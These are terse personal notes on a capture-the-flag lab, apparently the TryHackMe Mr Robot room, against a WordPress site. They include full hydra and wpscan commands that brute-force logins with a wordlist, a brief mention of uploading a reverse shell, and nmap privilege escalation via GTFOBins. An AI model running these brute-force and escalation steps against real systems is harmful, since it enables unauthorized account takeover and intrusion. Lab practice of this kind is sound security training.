nmap
Closed but it’s ok, THM take lot of time to load
Gobuster
wordpress login
http://10.10.185.72/wp-login.php
robots.txt
So…
Wordpress
Find the user
hydra -L fsocity.dic -p admin 10.10.185.72 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.185.72%2Fwp-admin%2F&testcookie=1:F=Invalid username." 
Find the password
wpscan -v -U user.txt -P fsocity.dic.sort --url http://10.10.185.72/wp-login.php
Revershell
zip it, send it, listen and activate.
Robot
md5
root
lse.sh
lse.sh is in my current directory.
/usr/local/bin/nmap
nmap exploit
https://gtfobins.github.io/gtfobins/nmap/
